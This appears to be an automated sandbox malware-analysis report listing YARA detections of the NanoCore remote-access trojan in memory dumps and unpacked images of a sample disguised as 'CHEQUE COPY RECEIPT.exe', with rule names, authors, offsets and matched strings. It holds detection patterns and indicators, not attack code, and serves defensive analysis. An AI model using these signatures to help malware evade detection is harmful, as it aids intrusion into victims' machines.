Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 5364	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1299de:$a: NanoCore 0x1299fa:$a: NanoCore 0x129b55:$a: NanoCore 0x129b64:$a: NanoCore 0x129e3d:$a: NanoCore 0x129e69:$a: NanoCore 0x129ed9:$a: NanoCore 0x13991b:$a: NanoCore 0x13992d:$a: NanoCore 0x139969:$a: NanoCore 0x129a85:$b: ClientPlugin 0x129bae:$b: ClientPlugin 0x129e72:$b: ClientPlugin 0x129ee2:$b: ClientPlugin 0x139936:$b: ClientPlugin 0x139972:$b: ClientPlugin 0x129cfb:$c: ProjectData 0x139868:$c: ProjectData 0x12ae37:$d: DESCrypto 0x13a1c6:$d: DESCrypto 0x1351c4:$e: KeepAlive
Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 3888	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x12e6e5:$x1: NanoCore.ClientPluginHost 0x12e746:$x2: IClientNetworkHost 0x133b4b:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x141abd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 3888	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 3888	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x12e1ea:$a: NanoCore 0x12e206:$a: NanoCore 0x12e361:$a: NanoCore 0x12e370:$a: NanoCore 0x12e649:$a: NanoCore 0x12e675:$a: NanoCore 0x12e6e5:$a: NanoCore 0x13e127:$a: NanoCore 0x13e139:$a: NanoCore 0x13e175:$a: NanoCore 0x12e291:$b: ClientPlugin 0x12e3ba:$b: ClientPlugin 0x12e67e:$b: ClientPlugin 0x12e6ee:$b: ClientPlugin 0x13e142:$b: ClientPlugin 0x13e17e:$b: ClientPlugin 0x12e507:$c: ProjectData 0x13e074:$c: ProjectData 0x12f643:$d: DESCrypto 0x13e9d2:$d: DESCrypto 0x1399d0:$e: KeepAlive
Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 3060	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1c90:$x1: NanoCore.ClientPluginHost 0x3202a:$x1: NanoCore.ClientPluginHost 0x76cbd:$x1: NanoCore.ClientPluginHost 0x19dbd0:$x1: NanoCore.ClientPluginHost 0x24dce7:$x1: NanoCore.ClientPluginHost 0x275c8d:$x1: NanoCore.ClientPluginHost 0x2af816:$x1: NanoCore.ClientPluginHost 0x33272a:$x1: NanoCore.ClientPluginHost 0x357f37:$x1: NanoCore.ClientPluginHost 0x375d9e:$x1: NanoCore.ClientPluginHost 0x2a7e:$x2: IClientNetworkHost 0x3208b:$x2: IClientNetworkHost 0x76d02:$x2: IClientNetworkHost 0x19dc31:$x2: IClientNetworkHost 0x24dd48:$x2: IClientNetworkHost 0x275cee:$x2: IClientNetworkHost 0x2af877:$x2: IClientNetworkHost 0x33276f:$x2: IClientNetworkHost 0x357f5d:$x2: IClientNetworkHost 0x375dc4:$x2: IClientNetworkHost 0xf084:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 3060	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 3060	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1c90:$a: NanoCore 0x2021:$a: NanoCore 0x2172:$a: NanoCore 0x11368:$a: NanoCore 0x11457:$a: NanoCore 0x31b2f:$a: NanoCore 0x31b4b:$a: NanoCore 0x31ca6:$a: NanoCore 0x31cb5:$a: NanoCore 0x31f8e:$a: NanoCore 0x31fba:$a: NanoCore 0x3202a:$a: NanoCore 0x41a6c:$a: NanoCore 0x41a7e:$a: NanoCore 0x41aba:$a: NanoCore 0x76c37:$a: NanoCore 0x76c64:$a: NanoCore 0x76cbd:$a: NanoCore 0x7e4cc:$a: NanoCore 0x7e4df:$a: NanoCore 0x7e511:$a: NanoCore
Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 1060	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1c90:$x1: NanoCore.ClientPluginHost 0x1487a:$x1: NanoCore.ClientPluginHost 0x2be0f:$x1: NanoCore.ClientPluginHost 0x319ce:$x1: NanoCore.ClientPluginHost 0x42d98:$x1: NanoCore.ClientPluginHost 0x5ea7a:$x1: NanoCore.ClientPluginHost 0x64df2:$x1: NanoCore.ClientPluginHost 0x935f3:$x1: NanoCore.ClientPluginHost 0x9ec15:$x1: NanoCore.ClientPluginHost 0xc8506:$x1: NanoCore.ClientPluginHost 0xea6f3:$x1: NanoCore.ClientPluginHost 0x113488:$x1: NanoCore.ClientPluginHost 0x1321ce:$x1: NanoCore.ClientPluginHost 0x2a7e:$x2: IClientNetworkHost 0x15632:$x2: IClientNetworkHost 0x2be35:$x2: IClientNetworkHost 0x31a13:$x2: IClientNetworkHost 0x42ddd:$x2: IClientNetworkHost 0x5eaa0:$x2: IClientNetworkHost 0x64e53:$x2: IClientNetworkHost 0x93619:$x2: IClientNetworkHost
Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 1060	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 1060	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1c90:$a: NanoCore 0x2021:$a: NanoCore 0x2172:$a: NanoCore 0x119fe:$a: NanoCore 0x11aed:$a: NanoCore 0x1487a:$a: NanoCore 0x14c0b:$a: NanoCore 0x14d5c:$a: NanoCore 0x24578:$a: NanoCore 0x24667:$a: NanoCore 0x2bd01:$a: NanoCore 0x2bda2:$a: NanoCore 0x2be0f:$a: NanoCore 0x2bed0:$a: NanoCore 0x2cda1:$a: NanoCore 0x2cdf4:$a: NanoCore 0x2ce2d:$a: NanoCore 0x2cea0:$a: NanoCore 0x31948:$a: NanoCore 0x31975:$a: NanoCore 0x319ce:$a: NanoCore
Click to see the 63 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.CHEQUE COPY RECEIPT.exe.356c1f8.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
1.2.CHEQUE COPY RECEIPT.exe.356c1f8.7.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
1.2.CHEQUE COPY RECEIPT.exe.356c1f8.7.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1d9e5:$x1: NanoCore.ClientPluginHost 0x1da22:$x2: IClientNetworkHost 0x21555:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1d75d:$x1: NanoCore Client.exe 0x1d9e5:$x2: NanoCore.ClientPluginHost 0x1f01e:$s1: PluginCommand 0x1f012:$s2: FileCommand 0x1fec3:$s3: PipeExists 0x25c7a:$s4: PipeCreated 0x1da0f:$s5: IClientLoggingHost
0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1d74d:$a: NanoCore 0x1d75d:$a: NanoCore 0x1d991:$a: NanoCore 0x1d9a5:$a: NanoCore 0x1d9e5:$a: NanoCore 0x1d7ac:$b: ClientPlugin 0x1d9ae:$b: ClientPlugin 0x1d9ee:$b: ClientPlugin 0x1d8d3:$c: ProjectData 0x1e2da:$d: DESCrypto 0x25ca6:$e: KeepAlive 0x23c94:$g: LogClientMessage 0x1fe8f:$i: get_Connected 0x1e610:$j: #=q 0x1e640:$j: #=q 0x1e65c:$j: #=q 0x1e68c:$j: #=q 0x1e6a8:$j: #=q 0x1e6c4:$j: #=q 0x1e6f4:$j: #=q 0x1e710:$j: #=q
1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
1.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
1.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
1.2.CHEQUE COPY RECEIPT.exe.3570821.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
1.2.CHEQUE COPY RECEIPT.exe.3570821.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
1.2.CHEQUE COPY RECEIPT.exe.3570821.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.CHEQUE COPY RECEIPT.exe.22ccc70.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
12.2.CHEQUE COPY RECEIPT.exe.22ccc70.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
1.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
1.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x4c338:$b: ClientPlugin 0x52f56:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q
12.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x251e5:$x1: NanoCore.ClientPluginHost 0x25222:$x2: IClientNetworkHost 0x28d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x24f5d:$x1: NanoCore Client.exe 0x251e5:$x2: NanoCore.ClientPluginHost 0x2681e:$s1: PluginCommand 0x26812:$s2: FileCommand 0x276c3:$s3: PipeExists 0x2d47a:$s4: PipeCreated 0x2520f:$s5: IClientLoggingHost
12.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24f4d:$a: NanoCore 0x24f5d:$a: NanoCore 0x25191:$a: NanoCore 0x251a5:$a: NanoCore 0x251e5:$a: NanoCore 0x24fac:$b: ClientPlugin 0x251ae:$b: ClientPlugin 0x251ee:$b: ClientPlugin 0x250d3:$c: ProjectData 0x25ada:$d: DESCrypto 0x2d4a6:$e: KeepAlive 0x2b494:$g: LogClientMessage 0x2768f:$i: get_Connected 0x25e10:$j: #=q 0x25e40:$j: #=q 0x25e5c:$j: #=q 0x25e8c:$j: #=q 0x25ea8:$j: #=q 0x25ec4:$j: #=q 0x25ef4:$j: #=q 0x25f10:$j: #=q
1.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
1.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
1.2.CHEQUE COPY RECEIPT.exe.5774629.13.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
1.2.CHEQUE COPY RECEIPT.exe.5774629.13.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
1.2.CHEQUE COPY RECEIPT.exe.5774629.13.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
12.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
1.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
